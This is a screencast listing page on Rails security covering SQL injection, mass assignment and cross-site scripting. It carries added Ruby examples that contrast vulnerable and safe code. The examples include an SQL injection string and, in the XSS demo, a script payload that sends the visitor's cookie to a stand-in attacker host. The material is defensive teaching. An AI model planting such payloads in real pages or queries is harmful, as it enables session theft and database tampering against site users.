
Railscasts Week 9

Language: English | Quality: High | Has audio: yes | Source: showmedo | Media: Flash
Let Ryan Bates take you through a growing series of great Rails tips.

Tags: Ruby on Rails, Ruby, Screencast, Showmedo, Web Development, SQL Injection, Cross-Site Scripting, Hacking

Resources referenced in this screencast
  • Ruby on Rails
  • SQL Injection
  • Cross-site scripting

    SQL Injection

    One of the most common security problems for dynamic sites is SQL injection. Rails quotes values for you when you pass user input through the conditions placeholders, but interpolating a request parameter straight into a SQL string sidesteps that protection entirely, so you still need to be aware of the problem and recognise the vulnerable pattern in your own code.
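The two query-building styles the episode contrasts, as an added example that is not code from the screencast or from Rails. It is plain Ruby with no database: it only builds the SQL text that would be sent. The quoting rules (doubling backslashes and single quotes, NULL for nil, a parenthesised list for arrays) and the `?` substitution are modelled on what ActiveRecord does for array conditions; the function names and the sample `users` table are assumptions for this illustration.

```ruby
# Added example (not from the screencast or Rails): string interpolation
# versus placeholder substitution with quoting. Plain Ruby, no database.

# Vulnerable: the raw parameter becomes part of the SQL grammar, so a
# quote in the input closes the literal and the rest is interpreted as SQL.
def find_user_sql_unsafe(name)
  "SELECT * FROM users WHERE name = '#{name}'"
end

# Quote a Ruby value as a SQL literal. Strings get backslashes and single
# quotes doubled (the rule ActiveRecord's quote_string applies); numbers
# pass through; nil becomes NULL; arrays become a parenthesised list.
def quote_sql(value)
  case value
  when nil   then "NULL"
  when true  then "1"
  when false then "0"
  when Integer, Float then value.to_s
  when Array then "(" + value.map { |v| quote_sql(v) }.join(", ") + ")"
  else
    "'" + value.to_s.gsub("\\") { "\\\\" }.gsub("'", "''") + "'"
  end
end

# Safe: each `?` is replaced by a quoted literal, so user input can only
# ever be a value, never SQL. Raises on a placeholder/value count mismatch,
# as ActiveRecord does. (Counting "?" is simplistic: a literal "?" inside
# the template text itself would be miscounted; fine for this demo.)
def sanitize_sql_array(template, *values)
  placeholders = template.count("?")
  unless placeholders == values.size
    raise ArgumentError,
          "wrong number of bind variables (#{values.size} for #{placeholders})"
  end
  queue = values.dup
  template.gsub("?") { quote_sql(queue.shift) }
end

def find_user_sql_safe(name)
  sanitize_sql_array("SELECT * FROM users WHERE name = ?", name)
end

if __FILE__ == $0
  payload = "bob' OR '1'='1"   # constructed attacker input
  puts find_user_sql_unsafe(payload)   # the WHERE clause is now always true
  puts find_user_sql_safe(payload)     # the same text, but as a harmless name
  puts sanitize_sql_array("SELECT * FROM users WHERE id IN ? AND active = ?", [1, 2, 3], true)
end
```

In the unsafe form the payload turns the condition into `name = 'bob' OR '1'='1'`, which matches every row; in the safe form the quotes are doubled and the whole payload is matched as a (non-existent) user name. The same applies to any ActiveRecord finder or scope that accepts a SQL fragment: interpolate and you are vulnerable, bind and you are not.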

    Hackers Love Mass Assignment

    Your site may be at risk! When you create or update a record directly from the form parameters, every attribute named in the request is written to the model, including columns the form never offered, foreign keys, and association ids. A user who adds fields to the submitted form therefore controls far more of that model and its associations than you intended. See how a hacker might exploit this and learn how to stop it in this episode.
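The problem and the two fixes, as an added example that is not code from the screencast or from Rails. It is a plain-Ruby model with no database; the class-level `attr_protected` (blacklist) and `attr_accessible` (whitelist) declarations are modelled on the ActiveRecord methods of the same name that the related articles below mention, but the module that implements them here is written for this illustration. The class names, the `users` columns and the `group_id` column (standing in for any foreign key or association id) are assumptions.

```ruby
# Added example (not from the screencast or Rails): what mass assignment
# does, and a blacklist and a whitelist policy that restrict it.

# Vulnerable: every key in the submitted parameter hash becomes an
# attribute write, including columns the form never offered.
class UnsafeUser
  attr_reader :attributes

  def initialize(params = {})
    @attributes = { "name" => nil, "email" => nil, "admin" => false }
    self.attributes = params
  end

  def attributes=(params)
    params.each { |key, value| @attributes[key.to_s] = value }
  end
end

# Class-level policy consulted on every mass write. Individual writers
# (user.admin = true) are deliberately untouched, so trusted code can
# still set protected columns one at a time.
module MassAssignmentSecurity
  def self.included(base)
    base.extend(ClassMethods)
  end

  module ClassMethods
    def attr_protected(*names)
      (@protected_attributes ||= []).concat(names.map(&:to_s))
    end

    def attr_accessible(*names)
      (@accessible_attributes ||= []).concat(names.map(&:to_s))
    end

    def protected_attributes
      @protected_attributes || []
    end

    def accessible_attributes # nil means no whitelist is in force
      @accessible_attributes
    end
  end

  # Drop forbidden keys instead of raising: the request still succeeds,
  # but only with the attributes the model allows.
  def sanitize_for_mass_assignment(params)
    whitelist = self.class.accessible_attributes
    blacklist = self.class.protected_attributes
    params.reject do |key, _|
      name = key.to_s
      (whitelist && !whitelist.include?(name)) || blacklist.include?(name)
    end
  end
end

# Blacklist: admin cannot be mass-assigned, but any other column still can.
class ProtectedUser < UnsafeUser
  include MassAssignmentSecurity
  attr_protected :admin

  def attributes=(params)
    super(sanitize_for_mass_assignment(params))
  end

  def admin=(flag)
    @attributes["admin"] = flag
  end
end

# Whitelist: only the named columns can be mass-assigned, so a column
# added later is protected by default. This is the safer of the two.
class AccessibleUser < UnsafeUser
  include MassAssignmentSecurity
  attr_accessible :name, :email

  def attributes=(params)
    super(sanitize_for_mass_assignment(params))
  end
end

if __FILE__ == $0
  # Constructed request: the form only had name and email; the attacker
  # appended admin and group_id by editing the form before submitting.
  params = { "name" => "mallory", "email" => "m@example.com",
             "admin" => true, "group_id" => 7 }
  [UnsafeUser, ProtectedUser, AccessibleUser].each do |klass|
    puts "#{klass}: #{klass.new(params).attributes.inspect}"
  end
end
```

Run it and the difference is visible in the output: `UnsafeUser` ends up with `admin => true` and a `group_id` it was never meant to accept, `ProtectedUser` keeps `admin` false but still takes the foreign key, and `AccessibleUser` accepts only the two whitelisted columns. That last line is the argument for whitelisting over blacklisting: you have to remember to protect each sensitive column, but you only have to remember to expose the harmless ones once.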

    Cross Site Scripting

    Another common security issue is cross-site scripting. In this episode you will see why it is so important to escape any user-submitted content before rendering it into your HTML, rather than trusting that it contains no markup.
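The escaping the episode argues for, as an added example that is not code from the screencast or from Rails. It renders a user-submitted comment into HTML with and without escaping, using `ERB::Util.html_escape` from Ruby's standard library; the Rails view helper `h()` does the same job. The comment markup, the function names and the attacker's payload (including the `evil.example` host) are constructed for this illustration.

```ruby
require "erb"

# Added example (not from the screencast or Rails): rendering user input
# into HTML with and without escaping. Plain Ruby, stdlib only.

# The standard escaper; Rails views reach it through the h() helper.
def h(text)
  ERB::Util.html_escape(text)
end

# Vulnerable: the body is dropped into markup unchanged, so a comment
# containing <script> becomes part of the page and runs in every
# visitor's browser, with that visitor's session cookie available to it.
def render_comment_unsafe(author, body)
  "<li><b>#{author}</b>: #{body}</li>"
end

# Safe for element content: &, <, > and quotes become entities, so the
# browser shows the comment as text instead of parsing it as markup.
def render_comment_safe(author, body)
  "<li><b>#{h(author)}</b>: #{h(body)}</li>"
end

# Render a whole comment list; the flag selects the escaping behaviour so
# both versions can be compared on identical input.
def render_comments(comments, escape: true)
  items = comments.map do |c|
    if escape
      render_comment_safe(c[:author], c[:body])
    else
      render_comment_unsafe(c[:author], c[:body])
    end
  end
  "<ul>\n" + items.join("\n") + "\n</ul>"
end

if __FILE__ == $0
  # Constructed comments: the second one ships the viewer's cookie to a
  # host the attacker controls (hypothetical evil.example).
  comments = [
    { author: "alice", body: "Nice post & thanks" },
    { author: "mallory",
      body: "<script>new Image().src='http://evil.example/?c='+document.cookie</script>" }
  ]
  puts render_comments(comments, escape: false)
  puts
  puts render_comments(comments)
end
```

Two caveats a practitioner should keep in mind. Entity escaping is the right defence for text placed between tags and inside quoted attribute values; it does not make a user-supplied URL safe to put in an `href` (a `javascript:` scheme survives escaping untouched), so links need a scheme whitelist as well. And in Rails 3 and later `<%= %>` escapes by default, but `raw` and `html_safe` opt back out, so the same discipline still applies to anything marked safe by hand.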


    Articles Related to this Topic

    Protecting against Cross Site Scripting (CSS/XSS)
    Many web applications use session cookies to track the requests of a user. The cookie is used to identify the request and connect it to the session data (@session in Rails). Usually the session contains a reference to the user that is currently logged in, e.g. the id of a User object
    Protecting against SQL Injection in Rails
    SQL Injection is the #1 security problem in many web applications. How does it work? If the web application includes strings from unreliable sources (usually form parameters) in SQL statements and doesn’t correctly quote any SQL meta characters like backslashes or single quotes, an attacker can change WHERE conditions in SQL statements, create records with invalid data or even execute arbitrary SQL statements.
    Demonstrating the Consequences of Cross Site Scripting (XSS) Vulnerabilities
    High risk vulnerabilities such as SQL Injection can be easily demonstrated by security analysts to developers or business executives. For example, a xp_cmdshell request injected into an application vulnerable to SQL Injection can be used to demonstrate how an attacker can abuse SQL injection to obtain a command prompt from the host running the (Microsoft) SQL server. Such demonstrations have major visual impact and the consequences of the vulnerabilities are clear
    Do not create records directly from form parameters
    If the attacker knows that the User model has an “admin” column, the newly created user will have administrator rights. One solution to this problem is, not to use mass-assignment and assign each value individually. Another solution is, to protect several properties so they can't be assigned using mass-assignment, but have to be set individually. The following line in your model will protect the “admin” attribute, i.e. it will be ignored during mass-assignment.
    Creating records directly from form parameters
    Active Record provides two ways of securing sensitive attributes from being overwritten by malicious users that change the form. The first is attr_protected that denies mass-assignment the right to change the named parameters.